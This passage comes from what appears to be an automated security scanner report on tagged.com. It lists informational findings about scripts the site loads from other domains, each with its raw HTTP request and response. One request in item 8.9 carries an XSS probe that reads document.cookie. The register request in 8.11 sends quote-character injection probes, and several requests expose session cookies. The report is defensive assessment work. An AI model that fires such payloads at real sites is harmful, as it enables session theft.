Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 92910

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Find Groups</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text/
...[SNIP]...
</link>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/yahoo/yahoo-min.js&2.8.0/build/event/event-min.js&2.8.0/build/dom/dom-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/p/Y7Ha01NCE.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/connection/connection-min.js&2.8.0/build/json/json-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/w/I2aeGGB9R.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/container/container-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/9/RWYIg6Gl6.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/cookie/cookie-min.js&2.8.0/build/container/container_core-min.js&2.8.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/r/tBb3aD9XN.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/element/element-min.js&2.8.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/Q/VaA8tpn7Y.js"></script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.6. http://www.tagged.com/help.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /help.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /help.html HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 18417

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text/css" href="htt
...[SNIP]...
</link>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/yahoo/yahoo-min.js&2.8.0/build/event/event-min.js&2.8.0/build/dom/dom-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/p/Y7Ha01NCE.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/connection/connection-min.js&2.8.0/build/json/json-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/w/I2aeGGB9R.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/container/container-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/9/RWYIg6Gl6.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/cookie/cookie-min.js&2.8.0/build/container/container_core-min.js&2.8.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/r/tBb3aD9XN.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/6/IA0NrFQOy.js"></script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.7. http://www.tagged.com/help.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /help.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /help.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/account_info.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; connect_status=-1; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:28:54 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 10469

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text/css" href="htt
...[SNIP]...
</link>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/yahoo/yahoo-min.js&2.8.0/build/event/event-min.js&2.8.0/build/dom/dom-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/p/Y7Ha01NCE.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/cookie/cookie-min.js&2.8.0/build/container/container_core-min.js&2.8.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/m/NjR_x7owD.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/connection/connection-min.js&2.8.0/build/json/json-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/X/ocZCEb-GY.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/container/container-min.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/g/l4XLT5pxV.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/Z/3M_GuDH2l.js"></script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.8. http://www.tagged.com/home.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /home.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /home.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532; S=t4urklho6estviojs26it3hs07

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:14:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 37661

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Home</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text/css" hr
...[SNIP]...
</link>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/yahoo/yahoo-min.js&2.8.0/build/event/event-min.js&2.8.0/build/dom/dom-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/p/Y7Ha01NCE.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/connection/connection-min.js&2.8.0/build/json/json-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/w/I2aeGGB9R.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/container/container-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/9/RWYIg6Gl6.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/cookie/cookie-min.js&2.8.0/build/container/container_core-min.js&2.8.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/r/tBb3aD9XN.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/V/VriPlzBx_.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/datasource/datasource-min.js&2.8.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/z/kR2ZGg-jk.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/animation/animation-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/Y/p7Ze36Pkx.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/f/d5ttxmwhy.js"></script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
...[SNIP]...
<img src="https://h.online-metrix.net/fp/clear.png?org_id=q2cczh8n&session_id=5450052999_1066473879&m=2" alt="" />
<script src="https://h.online-metrix.net/fp/check.js?org_id=q2cczh8n&session_id=5450052999_1066473879" type="text/javascript"></script>
...[SNIP]...

8.9. http://www.tagged.com/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.html?r=%2Fhome.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/api/?application_id=user&format=jsonaa996%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eba49b2dbe3e209c77&session_token=t4urklho6estviojs26it3hs07&method=tagged.reg.logUserActions&actions=%7B%22email%22%3A1%2C%22first_name%22%3A1%2C%22last_name%22%3A1%2C%22birth_month%22%3A1%2C%22birth_day%22%3A1%2C%22birth_year%22%3A1%2C%22zipCode%22%3A1%2C%22password%22%3A1%7D&api_signature=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; connect_status=-1; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:20:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 37138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="html_head">
<meta name="verify-v1" content="3D/41
...[SNIP]...
</link>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/utilities/utilities.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/yahoo/yahoo-min.js&2.8.0/build/cookie/cookie-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/A/dFYxg19Vt.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event/event-min.js&2.8.0/build/connection/connection-min.js&2.8.0/build/json/json-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/n/7wE7hDN3o.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/dom/dom-min.js&2.8.0/build/datasource/datasource-min.js&2.8.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/G/mFcImw0jQ.js"></script>
...[SNIP]...
<!--show captcha-->
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js?123"></script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

8.10. http://www.tagged.com/profile.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /profile.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /profile.html HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 30381

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - My Profile</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text/c
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.tagged.com/css/custom_css.css?v=733fa9" id="link_custom_css" />
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/yahoo/yahoo-min.js&2.8.0/build/get/get-min.js&2.8.0/build/event/event-min.js&2.8.0/build/dom/dom-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/p/Y7Ha01NCE.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/connection/connection-min.js&2.8.0/build/json/json-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/w/I2aeGGB9R.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/container/container-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/9/RWYIg6Gl6.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/cookie/cookie-min.js&2.8.0/build/container/container_core-min.js&2.8.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/r/tBb3aD9XN.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/5/8XfVvD2Lp.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/animation/animation-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/L/2tk2TLM1z.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/dragdrop/dragdrop-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/v/jD_tmsO-V.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/element/element-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/u/xo8-CIOrf.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/slider/slider-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/V/71A92wgfH.js"></script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.11. http://www.tagged.com/register.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /register.html

Issue detail

The response dynamically includes the following script from another domain:

Request

POST /register.html?page=index HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
Cache-Control: max-age=0
Origin: http://www.tagged.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=dvhiv3dhhk4sr6bc1ttavum794; __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532
Content-Length: 409

firstName=%27&lastName=%27&gender=F&birthMonth=1&birthDay=1&birthYear=1970&country=US&city=&zipCode=10010&locale=en_US&email=test%40fastdial.net&password=SkipIt1&recaptcha_challenge_field=03AHJ_Vuvg3Y
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 29969

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Tagged - Register</title>
<link rel="stylesheet" type="text/
...[SNIP]...
</p><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js?123"></script>
...[SNIP]...

8.12. http://www.tagged.com/safety.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /safety.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /safety.html HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 23041

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Safety, Security, and Privacy Overview</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link r
...[SNIP]...
</link>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/yahoo/yahoo-min.js&2.8.0/build/event/event-min.js&2.8.0/build/dom/dom-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/p/Y7Ha01NCE.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/connection/connection-min.js&2.8.0/build/json/json-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/w/I2aeGGB9R.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/container/container-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/9/RWYIg6Gl6.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/cookie/cookie-min.js&2.8.0/build/container/container_core-min.js&2.8.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/r/tBb3aD9XN.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/6/IA0NrFQOy.js"></script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.13. http://www.tagged.com/search.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /search.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search.html HTTP/1.1
Host: www.tagged.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: connect_status=-1; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmc=50703532; __utmb=50703532.0.10.1293588625; __qca=P0-159294429-1293588622548;

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:18:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 11978

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Search</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text/css"
...[SNIP]...
</link>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/yahoo/yahoo-min.js&2.8.0/build/event/event-min.js&2.8.0/build/dom/dom-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/p/Y7Ha01NCE.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/cookie/cookie-min.js&2.8.0/build/container/container_core-min.js&2.8.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/m/NjR_x7owD.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/connection/connection-min.js&2.8.0/build/json/json-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/X/ocZCEb-GY.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/container/container-min.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/g/l4XLT5pxV.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/W/GoG9pMqt1.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/datasource/datasource-min.js&2.8.0/build/autocomplete/autocomplete-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/f/_sLAB-ITX.js"></script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.14. http://www.tagged.com/support.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /support.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-159294429-1293588622548; __utmz=50703532.1293588625.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); S=t4urklho6estviojs26it3hs07; connect_status=-1; __utma=50703532.851797930.1293588625.1293588625.1293588625.1; __utmb=50703532.0.10.1293588625; __utmc=50703532

Response

HTTP/1.1 200 OK
Date: Wed, 29 Dec 2010 02:29:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-FRAME-OPTIONS: DENY
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 12251

<!DOCTYPE html>
<html>
<head id="html_head">
<title>Tagged - Contact</title>
<noscript><meta http-equiv="X-Frame-Options" content="deny"/></noscript>
<link rel="stylesheet" type="text/css"
...[SNIP]...
</link>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/yahoo/yahoo-min.js&2.8.0/build/event/event-min.js&2.8.0/build/dom/dom-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/p/Y7Ha01NCE.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/cookie/cookie-min.js&2.8.0/build/container/container_core-min.js&2.8.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/m/NjR_x7owD.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/connection/connection-min.js&2.8.0/build/json/json-min.js"></script>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/X/ocZCEb-GY.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.8.0/build/container/container-min.js"></script>
...[SNIP]...
</link>
<script type="text/javascript" src="http://x.tagstat.com/dyn/js/g/l4XLT5pxV.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://x.tagstat.com/dyn/js/D/tjsMBuifH.js"></script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://www.google.com/recaptcha/api/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.15. http://www.tagged.com/support.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /support.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /support.html HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/support.html
Cache-Control: max-age=0
Origin: http://www.tagged.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
